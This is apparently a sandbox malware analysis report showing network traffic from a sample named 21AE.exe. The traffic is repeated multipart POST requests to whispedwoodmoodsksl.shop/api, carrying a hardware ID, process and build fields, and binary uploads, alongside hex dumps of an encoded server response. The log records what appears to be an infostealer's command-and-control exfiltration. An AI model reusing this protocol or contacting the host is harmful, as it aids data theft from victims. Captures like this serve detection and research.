                                                          2024-05-26 22:27:26 UTC557INData Raw: 33 31 39 38 0d 0a 48 33 67 46 64 69 65 67 68 6d 57 47 2f 52 35 34 64 51 64 49 77 54 34 32 4a 62 61 48 64 30 38 2b 70 4e 70 6a 75 39 6d 43 73 38 78 6b 57 6e 4e 55 48 5a 53 71 52 2f 57 59 50 45 49 42 64 54 32 6b 45 68 52 45 30 71 56 4e 4b 56 2f 49 71 51 61 58 2b 2b 66 4c 37 69 55 6a 66 6c 52 43 7a 71 52 66 70 4a 68 30 47 68 52 72 4b 71 42 56 57 56 58 61 35 42 38 6a 57 63 79 2f 41 4e 2b 34 37 74 36 70 65 68 31 6b 48 45 6e 4a 36 77 33 72 33 7a 4a 61 45 48 31 71 2b 78 78 37 51 4d 4c 6d 4f 69 35 4e 7a 2f 67 65 6c 36 4b 67 31 71 49 39 51 69 63 58 51 73 4c 71 41 2b 4b 57 64 68 41 64 59 79 75 6c 56 45 5a 4d 30 4f 38 66 4c 56 72 4e 74 51 6e 4c 74 65 54 5a 6f 6e 77 58 5a 46 51 4c 67 75 4d 66 70 4d 63 38 53 53 56 6d 4f 37 4a 4a 57 56 66 53 70 51 70 6a 52 59 61 2f 44
                                                          Data Ascii: 3198H3gFdieghmWG/R54dQdIwT42JbaHd08+pNpju9mCs8xkWnNUHZSqR/WYPEIBdT2kEhRE0qVNKV/IqQaX++fL7iUjflRCzqRfpJh0GhRrKqBVWVXa5B8jWcy/AN+47t6peh1kHEnJ6w3r3zJaEH1q+xx7QMLmOi5Nz/gel6Kg1qI9QicXQsLqA+KWdhAdYyulVEZM0O8fLVrNtQnLteTZonwXZFQLguMfpMc8SSVmO7JJWVfSpQpjRYa/D
                                                          2024-05-26 22:27:26 UTC1369INData Raw: 67 7a 75 42 6b 57 6d 41 59 42 5a 71 6b 43 65 47 51 62 68 73 46 59 43 53 78 55 46 46 42 32 65 59 62 4c 56 6e 42 74 51 2f 66 76 4f 50 5a 71 6e 77 55 61 78 35 47 78 75 64 48 71 74 39 37 41 6c 63 39 61 70 4a 66 55 45 44 47 35 68 74 74 51 34 69 68 51 64 36 33 6f 49 6e 75 64 78 78 71 48 55 37 46 37 41 76 32 6c 48 4d 5a 48 6d 49 73 71 56 39 63 54 64 4c 72 46 43 70 5a 77 61 6f 50 30 72 62 6a 32 36 67 39 56 43 63 54 58 59 4b 38 52 38 71 63 62 51 77 6c 5a 6a 75 79 48 45 73 4a 7a 61 55 53 49 52 79 65 2b 41 6a 52 74 4f 33 63 70 48 4d 66 61 68 31 45 77 2b 6b 42 37 35 35 30 45 68 4e 69 4b 71 64 52 57 30 6e 55 36 78 30 6f 57 4d 79 78 51 5a 66 37 35 38 6e 75 4a 56 70 58 47 55 6e 4f 37 77 75 6b 67 44 49 44 56 32 49 6d 34 77 51 55 54 74 7a 71 47 43 42 57 79 4c 30 4d 30 4c
                                                          Data Ascii: gzuBkWmAYBZqkCeGQbhsFYCSxUFFB2eYbLVnBtQ/fvOPZqnwUax5GxudHqt97Alc9apJfUEDG5httQ4ihQd63oInudxxqHU7F7Av2lHMZHmIsqV9cTdLrFCpZwaoP0rbj26g9VCcTXYK8R8qcbQwlZjuyHEsJzaUSIRye+AjRtO3cpHMfah1Ew+kB7550EhNiKqdRW0nU6x0oWMyxQZf758nuJVpXGUnO7wukgDIDV2Im4wQUTtzqGCBWyL0M0L
                                                          2024-05-26 22:27:26 UTC1369INData Raw: 50 79 39 6b 47 6b 76 46 38 6b 66 37 30 57 56 61 45 47 6c 71 2b 78 78 66 52 39 6a 69 48 53 74 59 7a 72 63 4f 30 4b 6e 68 33 61 42 76 48 57 63 64 53 38 33 6f 44 75 6d 59 63 52 45 64 61 43 36 6b 58 52 51 4a 6c 4f 49 4e 62 51 53 47 6a 68 48 55 74 38 37 61 6f 6e 52 61 65 46 70 63 67 75 4d 4c 70 4d 63 38 48 68 74 74 49 4b 78 56 58 6b 33 62 37 42 55 6c 56 63 2b 37 41 64 57 39 34 64 32 69 63 42 39 6b 45 55 6a 48 35 41 76 6a 6d 48 31 61 57 53 55 74 75 78 77 4d 42 2b 54 6f 47 53 5a 51 68 49 30 43 31 37 58 6e 78 2b 35 69 56 48 35 55 51 73 36 6b 58 36 53 51 66 52 63 64 62 69 53 76 58 56 52 44 31 2b 38 56 49 6c 6e 41 73 41 6a 5a 71 65 66 65 72 33 77 52 62 42 6c 4c 78 2b 55 43 34 39 38 79 57 68 42 39 61 76 73 63 65 57 37 75 70 51 70 6a 52 59 61 2f 44 5a 6e 6a 6f 4e 57
                                                          Data Ascii: Py9kGkvF8kf70WVaEGlq+xxfR9jiHStYzrcO0Knh3aBvHWcdS83oDumYcREdaC6kXRQJlOINbQSGjhHUt87aonRaeFpcguMLpMc8HhttIKxVXk3b7BUlVc+7AdW94d2icB9kEUjH5AvjmH1aWSUtuxwMB+ToGSZQhI0C17Xnx+5iVH5UQs6kX6SQfRcdbiSvXVRD1+8VIlnAsAjZqefer3wRbBlLx+UC498yWhB9avsceW7upQpjRYa/DZnjoNW
                                                          2024-05-26 22:27:26 UTC1369INData Raw: 78 39 4b 79 65 46 48 71 74 39 37 41 6c 63 39 61 70 4a 66 51 6c 44 45 36 56 55 79 45 74 2f 34 42 74 58 37 75 4a 47 76 62 78 42 74 47 6b 44 4e 34 51 54 72 6d 48 45 63 47 32 38 6a 71 31 70 62 54 73 62 6d 47 53 4e 62 79 4c 51 50 31 4c 48 6a 33 4f 34 7a 57 6d 41 4d 42 5a 71 6b 4b 2b 4f 53 55 68 45 62 59 6d 71 38 45 6b 30 48 30 2b 6c 56 64 52 7a 4b 73 67 33 51 75 2b 6e 55 70 6e 59 54 59 68 56 4f 78 2b 63 42 36 5a 42 31 43 42 31 6d 4a 4b 42 51 57 45 48 56 35 67 63 6c 56 59 62 32 51 64 36 6a 6f 49 6e 75 58 42 52 71 41 45 4c 53 70 42 69 71 68 6a 77 64 47 79 56 79 34 31 39 56 53 4e 66 6b 47 43 74 56 7a 72 67 48 33 4c 54 74 33 36 6c 36 47 6d 6f 61 53 73 54 73 43 75 69 55 63 68 4d 52 5a 53 75 70 48 42 6f 48 30 2f 31 56 64 52 7a 32 75 77 48 5a 6f 4b 44 4f 34 47 52 61
                                                          Data Ascii: x9KyeFHqt97Alc9apJfQlDE6VUyEt/4BtX7uJGvbxBtGkDN4QTrmHEcG28jq1pbTsbmGSNbyLQP1LHj3O4zWmAMBZqkK+OSUhEbYmq8Ek0H0+lVdRzKsg3Qu+nUpnYTYhVOx+cB6ZB1CB1mJKBQWEHV5gclVYb2Qd6joInuXBRqAELSpBiqhjwdGyVy419VSNfkGCtVzrgH3LTt36l6GmoaSsTsCuiUchMRZSupHBoH0/1VdRz2uwHZoKDO4GRa
                                                          2024-05-26 22:27:26 UTC1369INData Raw: 66 32 46 61 54 52 50 42 30 50 4a 58 4c 6a 61 6c 4e 58 78 4f 5a 58 48 45 72 46 72 67 72 55 74 36 44 4f 34 47 52 61 59 42 67 46 6d 71 51 42 36 35 5a 2f 46 52 5a 73 4a 71 35 5a 58 55 4c 56 34 78 45 6e 56 73 61 2b 42 39 69 2b 36 74 4b 76 64 78 4e 67 48 45 4c 42 39 6b 65 71 33 33 73 43 56 7a 31 71 69 6c 74 47 53 63 53 6c 43 6d 4e 46 68 72 38 4e 6d 65 4f 67 31 61 52 79 48 6d 41 59 51 38 66 69 43 75 57 51 66 52 6f 59 59 53 47 71 57 6c 56 4b 30 65 67 52 50 31 62 4e 74 77 33 51 74 2b 32 52 34 44 30 64 66 31 51 64 67 74 55 4b 36 70 46 37 44 46 64 36 5a 4c 6f 63 55 30 75 55 76 56 55 73 55 4d 6d 37 44 74 71 34 34 64 75 38 62 78 5a 75 48 45 44 4f 37 77 6e 69 6a 58 6f 56 48 6d 59 70 71 6c 74 63 53 39 37 6d 45 6d 30 53 68 72 38 5a 6d 65 4f 67 38 72 6c 74 46 79 63 4c 43
                                                          Data Ascii: f2FaTRPB0PJXLjalNXxOZXHErFrgrUt6DO4GRaYBgFmqQB65Z/FRZsJq5ZXULV4xEnVsa+B9i+6tKvdxNgHELB9keq33sCVz1qiltGScSlCmNFhr8NmeOg1aRyHmAYQ8fiCuWQfRoYYSGqWlVK0egRP1bNtw3Qt+2R4D0df1QdgtUK6pF7DFd6ZLocU0uUvVUsUMm7Dtq44du8bxZuHEDO7wnijXoVHmYpqltcS97mEm0Shr8ZmeOg8rltFycLC
                                                          2024-05-26 22:27:26 UTC1369INData Raw: 74 6d 33 51 5a 46 32 45 75 70 46 6c 58 53 39 2f 69 46 69 4a 59 7a 37 59 49 31 76 75 75 6b 61 6c 6c 57 6a 39 55 5a 4e 6e 6e 43 2b 6e 66 59 31 51 4f 4a 53 32 76 48 41 77 48 32 4f 73 51 4c 56 62 41 76 41 54 66 73 65 58 52 70 58 34 56 59 78 4a 42 7a 65 51 4d 37 5a 35 36 48 78 31 75 4c 4b 35 66 55 6b 47 55 71 31 55 71 52 49 62 67 51 66 6d 67 37 64 32 70 50 51 55 70 44 51 58 46 36 45 65 38 33 33 63 57 45 32 49 71 72 6c 39 63 51 74 44 76 45 43 31 55 31 4c 41 42 33 71 6e 79 30 61 64 34 46 6d 51 55 51 63 54 74 41 65 65 62 50 46 52 58 59 6a 4c 6a 42 42 52 71 32 4f 49 38 4b 6b 65 47 70 30 2f 41 2b 2b 66 64 37 69 56 61 5a 68 39 50 7a 65 6b 45 34 70 78 33 48 78 31 6b 4c 61 74 52 52 6b 54 62 36 68 45 74 55 38 43 2b 41 4e 61 39 35 39 69 76 64 52 30 6e 57 67 58 46 2f 45
                                                          Data Ascii: tm3QZF2EupFlXS9/iFiJYz7YI1vuukallWj9UZNnnC+nfY1QOJS2vHAwH2OsQLVbAvATfseXRpX4VYxJBzeQM7Z56Hx1uLK5fUkGUq1UqRIbgQfmg7d2pPQUpDQXF6Ee833cWE2Iqrl9cQtDvEC1U1LAB3qny0ad4FmQUQcTtAeebPFRXYjLjBBRq2OI8KkeGp0/A++fd7iVaZh9PzekE4px3Hx1kLatRRkTb6hEtU8C+ANa959ivdR0nWgXF/E
                                                          2024-05-26 22:27:26 UTC1369INData Raw: 57 6b 38 31 5a 4f 4e 59 52 51 65 4d 74 55 64 32 43 5a 58 76 55 59 75 6b 72 73 6a 75 61 31 6f 2f 52 67 75 43 39 6b 65 38 33 7a 73 5a 42 58 63 73 6f 45 70 58 41 4f 72 62 4f 79 70 61 77 37 38 52 6d 35 58 72 78 61 6b 39 56 43 63 62 42 5a 72 64 52 36 7a 66 51 31 52 58 66 57 72 37 48 47 46 45 32 75 73 53 4f 30 32 4c 6c 67 62 66 76 75 66 42 37 46 4d 52 63 78 4d 46 6a 4b 51 42 70 4d 63 73 56 46 64 68 4f 2b 4d 45 42 42 57 50 73 45 5a 36 44 4a 53 6e 54 38 44 37 39 70 48 32 4c 31 51 6e 42 67 57 61 70 45 44 6e 6a 57 34 63 46 48 4d 70 35 47 4a 71 52 4d 4c 6f 47 69 5a 64 2b 49 59 76 31 4c 72 6a 33 2b 78 4d 44 47 6f 45 52 73 66 6a 4f 64 71 52 65 77 34 51 61 79 79 6a 48 42 6f 48 32 36 56 4e 46 42 79 4f 2b 44 36 58 2b 2f 69 52 39 6a 30 76 5a 42 70 4c 78 66 49 57 71 62 78
                                                          Data Ascii: Wk81ZONYRQeMtUd2CZXvUYukrsjua1o/RguC9ke83zsZBXcsoEpXAOrbOypaw78Rm5Xrxak9VCcbBZrdR6zfQ1RXfWr7HGFE2usSO02LlgbfvufB7FMRcxMFjKQBpMcsVFdhO+MEBBWPsEZ6DJSnT8D79pH2L1QnBgWapEDnjW4cFHMp5GJqRMLoGiZd+IYv1Lrj3+xMDGoERsfjOdqRew4QayyjHBoH26VNFByO+D6X+/iR9j0vZBpLxfIWqbx
                                                          2024-05-26 22:27:26 UTC1369INData Raw: 6d 72 37 5a 52 51 50 6d 4f 51 59 49 56 69 47 68 30 2b 5a 6f 36 43 4a 37 6c 34 49 64 52 70 4f 77 2b 63 52 37 35 4a 77 43 31 70 47 4a 72 68 36 55 31 62 64 70 56 74 74 57 6f 62 67 55 5a 66 37 35 4d 44 75 4a 55 6f 31 54 78 43 52 73 31 65 32 67 44 49 44 56 33 4e 71 2b 77 34 61 42 38 61 6c 54 57 30 62 78 61 6f 54 33 37 6a 32 30 75 6c 44 4a 45 4d 66 53 38 58 63 44 4f 71 52 66 31 70 5a 4a 53 58 6a 42 47 30 48 78 4f 49 55 4b 6c 44 51 71 51 62 4a 72 2b 66 42 76 7a 45 41 61 42 6f 46 6a 4b 51 57 37 34 6c 37 46 52 52 70 4b 61 5a 62 52 41 76 4f 36 68 74 74 59 34 6a 34 47 5a 6e 6a 6f 50 4b 38 62 78 52 73 46 55 62 55 37 77 72 6f 6a 6a 45 2b 48 47 73 74 6d 31 64 61 53 64 65 6c 57 32 31 61 68 75 42 52 6c 2f 76 6b 77 4f 34 6c 53 6a 56 50 45 4a 47 7a 56 37 61 41 4d 67 4e 58
                                                          Data Ascii: mr7ZRQPmOQYIViGh0+Zo6CJ7l4IdRpOw+cR75JwC1pGJrh6U1bdpVttWobgUZf75MDuJUo1TxCRs1e2gDIDV3Nq+w4aB8alTW0bxaoT37j20ulDJEMfS8XcDOqRf1pZJSXjBG0HxOIUKlDQqQbJr+fBvzEAaBoFjKQW74l7FRRpKaZbRAvO6httY4j4GZnjoPK8bxRsFUbU7wrojjE+HGstm1daSdelW21ahuBRl/vkwO4lSjVPEJGzV7aAMgNX
                                                          2024-05-26 22:27:26 UTC1369INData Raw: 6c 46 51 4d 54 62 4b 78 70 4e 77 61 68 44 2f 37 6a 32 30 75 34 7a 57 6e 39 55 48 59 4c 45 46 2b 65 4c 65 31 6f 49 4b 7a 50 6a 53 68 51 66 68 36 74 56 50 78 79 65 2b 45 62 58 74 75 48 53 6f 48 34 49 64 52 4a 47 31 4f 64 41 32 71 46 62 43 42 78 6b 61 4a 46 4d 58 31 50 58 35 41 35 76 66 4e 61 31 46 4d 69 38 38 4f 2b 51 53 67 74 67 42 41 66 6b 35 78 48 6e 33 7a 4a 61 44 79 56 79 34 33 74 47 54 4e 58 58 42 53 5a 49 78 62 6b 61 2b 61 76 74 78 4c 39 36 43 69 63 4c 43 39 75 6b 45 61 54 48 4c 31 52 58 64 32 72 37 48 42 4e 4a 32 65 51 57 49 31 2f 55 71 67 66 61 72 65 4f 57 6b 45 4d 75 62 41 42 47 7a 4f 49 4d 32 71 46 4c 43 78 42 31 61 49 56 66 51 6b 53 55 71 31 55 31 48 4a 37 34 4e 64 4b 76 34 39 2b 6f 64 6c 70 34 57 6c 79 43 38 6b 65 38 7a 44 4a 61 42 53 56 79 34
                                                          Data Ascii: lFQMTbKxpNwahD/7j20u4zWn9UHYLEF+eLe1oIKzPjShQfh6tVPxye+EbXtuHSoH4IdRJG1OdA2qFbCBxkaJFMX1PX5A5vfNa1FMi88O+QSgtgBAfk5xHn3zJaDyVy43tGTNXXBSZIxbka+avtxL96CicLC9ukEaTHL1RXd2r7HBNJ2eQWI1/UqgfareOWkEMubABGzOIM2qFLCxB1aIVfQkSUq1U1HJ74NdKv49+odlp4WlyC8ke8zDJaBSVy4


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          2192.168.2.549724188.114.97.34435640C:\Users\user\AppData\Local\Temp\21AE.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-05-26 22:27:27 UTC290OUTPOST /api HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                          Content-Length: 12830
                                                          Host: whispedwoodmoodsksl.shop
                                                          2024-05-26 22:27:27 UTC12830OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 34 34 38 30 37 45 30 37 32 42 44 41 39 37 33 34 30 45 41 42 45 31 32 36 41 34 44 46 34 45 44 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 73 77 67 35 45 47 2d 2d 0d 0a 2d 2d 62
                                                          Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"944807E072BDA97340EABE126A4DF4ED--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"swg5EG----b
                                                          2024-05-26 22:27:28 UTC820INHTTP/1.1 200 OK
                                                          Date: Sun, 26 May 2024 22:27:28 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Set-Cookie: PHPSESSID=a82oopj0ggddejhcmcg5mlmu88; expires=Thu, 19-Sep-2024 16:14:06 GMT; Max-Age=9999999; path=/
                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                          Pragma: no-cache
                                                          CF-Cache-Status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zzRVUETFSAN3BZeROjNHkshu%2FLyHZewK5u4Qx6rI%2FvrNFNvRsiEe%2Fd5%2BO1TXidH51b0sUj7Jvxdv4soRGK6mXNbKg%2FQaiFZhwbvp%2FR%2BKWqi4MEPJrjWv69XQ4S6XTOmBuwtd9%2FrUV0avLwo%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 88a131523829188d-EWR
                                                          alt-svc: h3=":443"; ma=86400
                                                          2024-05-26 22:27:28 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 0d 0a
                                                          Data Ascii: fok 8.46.123.175
                                                          2024-05-26 22:27:28 UTC5INData Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          3192.168.2.549726188.114.97.34435640C:\Users\user\AppData\Local\Temp\21AE.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-05-26 22:27:28 UTC290OUTPOST /api HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                          Content-Length: 15072
                                                          Host: whispedwoodmoodsksl.shop
                                                          2024-05-26 22:27:28 UTC15072OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 34 34 38 30 37 45 30 37 32 42 44 41 39 37 33 34 30 45 41 42 45 31 32 36 41 34 44 46 34 45 44 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 73 77 67 35 45 47 2d 2d 0d 0a 2d 2d 62
                                                          Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"944807E072BDA97340EABE126A4DF4ED--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"swg5EG----b
                                                          2024-05-26 22:27:29 UTC812INHTTP/1.1 200 OK
                                                          Date: Sun, 26 May 2024 22:27:29 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Set-Cookie: PHPSESSID=7vafgaj9gi9iq7oq9nuhvch45t; expires=Thu, 19-Sep-2024 16:14:08 GMT; Max-Age=9999999; path=/
                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                          Pragma: no-cache
                                                          CF-Cache-Status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XBowP%2BfiLw9rl%2FpBZ0ufXXQCM3lVjc2JVVSxm6pGlAhFv7yZkFjSCJ97RwhXnX8Iu3mtusRrO558mHjohGN57xWmmURZNm99JlQvAEX%2BuDBWVVfcu7KoP%2B4zalnjmvvALTeLmuaRbjXcDZc%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 88a1315a9fe84228-EWR
                                                          alt-svc: h3=":443"; ma=86400
                                                          2024-05-26 22:27:29 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 0d 0a
                                                          Data Ascii: fok 8.46.123.175
                                                          2024-05-26 22:27:29 UTC5INData Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          4192.168.2.549727188.114.97.34435640C:\Users\user\AppData\Local\Temp\21AE.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-05-26 22:27:30 UTC290OUTPOST /api HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                          Content-Length: 20562
                                                          Host: whispedwoodmoodsksl.shop
                                                          2024-05-26 22:27:30 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 34 34 38 30 37 45 30 37 32 42 44 41 39 37 33 34 30 45 41 42 45 31 32 36 41 34 44 46 34 45 44 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 73 77 67 35 45 47 2d 2d 0d 0a 2d 2d 62
                                                          Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"944807E072BDA97340EABE126A4DF4ED--be85de5ipdocierre1Content-Disposition: form-data; name="pid"3--be85de5ipdocierre1Content-Disposition: form-data; name="lid"swg5EG----b
                                                          2024-05-26 22:27:30 UTC5231OUTData Raw: 95 d9 76 89 c4 4d c9 4d d9 5a b5 da 68 27 0c 46 c7 33 b7 ee 57 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 75 6e 20 0a e6 d6 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 ce 0d 46 c1 dc ba 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 b9 81 28 98 5b f7 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3a 37 18 05 73 eb 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 e7 06 a2 60 6e dd 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 eb dc 60 14
                                                          Data Ascii: vMMZh'F3Wun 4F([:7s~X`nO`
                                                          2024-05-26 22:27:30 UTC820INHTTP/1.1 200 OK
                                                          Date: Sun, 26 May 2024 22:27:30 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Set-Cookie: PHPSESSID=pvq46rqjvntdk15c5km9jpqfr1; expires=Thu, 19-Sep-2024 16:14:09 GMT; Max-Age=9999999; path=/
                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                          Pragma: no-cache
                                                          CF-Cache-Status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lKXQyQoVOzvWZhxs4FI3%2B%2FgL%2FG%2FxFkil1jAA5BVKD%2Bd1HQtwqDZ32EPd%2FUfKShgTjd4nXjVSCCD4FtPiLzjCbPgHnJZhjV7OWi6BZAcZ1A6U1%2BcW8xO5g7DUsD%2B8FOXsZ0pOBk8IHAXsosY%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 88a1316218084314-EWR
                                                          alt-svc: h3=":443"; ma=86400
                                                          2024-05-26 22:27:30 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 0d 0a
                                                          Data Ascii: fok 8.46.123.175
                                                          2024-05-26 22:27:30 UTC5INData Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          5192.168.2.549728188.114.97.34435640C:\Users\user\AppData\Local\Temp\21AE.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-05-26 22:27:32 UTC289OUTPOST /api HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                          Content-Length: 5445
                                                          Host: whispedwoodmoodsksl.shop
                                                          2024-05-26 22:27:32 UTC5445OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 34 34 38 30 37 45 30 37 32 42 44 41 39 37 33 34 30 45 41 42 45 31 32 36 41 34 44 46 34 45 44 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 73 77 67 35 45 47 2d 2d 0d 0a 2d 2d 62
                                                          Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"944807E072BDA97340EABE126A4DF4ED--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"swg5EG----b
                                                          2024-05-26 22:27:32 UTC816INHTTP/1.1 200 OK
                                                          Date: Sun, 26 May 2024 22:27:32 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
